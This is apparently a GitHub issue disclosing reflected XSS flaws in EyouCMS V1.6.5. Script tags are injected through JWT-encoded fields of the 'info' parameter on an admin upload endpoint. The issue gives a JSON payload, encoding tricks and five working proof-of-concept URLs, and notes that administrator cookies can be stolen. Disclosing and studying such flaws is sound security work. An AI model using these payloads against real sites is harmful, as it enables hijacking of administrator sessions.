Skip to content

EyouCMS-V1.6.5 has multiple reflective XSS vulnerabilities #57

Closed
@Hebing123

Description

@Hebing123

Summary

EyouCMS-V1.6.5 When uploading images locally, the program will use the info parameter to set the parameters carried by the upload form.
Multiple reflective XSS vulnerabilities can be created by modifying the JWT encrypted HEADER of the accepted JSON data and setting the parameter it contains to a malicious value.
These parameters are: num,input,path,func,is_water
image
There is no update on github, the latest installation package (V1.6.5) is:
https://qiniu.eyoucms.com/source/EyouCMS-V1.6.5-UTF8-SP1_1221.zip

Details

The exploit of this XSS vulnerability is mainly to construct the form to carry parameters, header is directly referenced by <input> into the page.
The info parameter should be replaced with a "+" if it contains a "-" after JWT encryption. The guess is that the developer may have incorrectly implemented the logic of URL encoding and decoding, resulting in accepting only "+" and not "-". This may be because they only consider standard URL encoding rules and ignore URL security encoding rules.

POC

HEADER:ALGORITHM & TOKEN TYPE:

{
  "num": "1",
  "size": "2097152",
  "input": "",
  "func": "head_pic_call_back",
  "path": "allimg",
  "is_water": "1'\"()&%<zzz><ScRiPt >alert(9240)</ScRiPt>",
  "alg": "HS256"
}

Note: you do not need to carry data when encrypting, just encrypt the corresponding parameter of the header, replace "-" with "+", and then perform url encoding.Don't go in the wrong order, or you'll convert the + to a space.

In Header, when the num parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0NCk8L1NjUmlQdD4iLCJzaXplIjoiMjA5NzE1MiIsImlucHV0IjoiIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

image
image

In Header, when the input parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IlwiPjxTY1JpUHQgPmFsZXJ0KDk3NDUpPC9TY1JpUHQ%2BIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=
image
image

In Header, when the path parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0Nyk8L1NjUmlQdD4iLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=
image
image

In Header, when the func parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2tcIj48U2NSaVB0ID5hbGVydCg5NzQ2KTwvU2NSaVB0PiIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=
image
image

In Header, when the is_water parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nIiwiaXNfd2F0ZXIiOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0OCk8L1NjUmlQdD4iLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=
image
image

Impact

An administrator who is already logged in can have a cookie stolen after accessing the malicious url.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions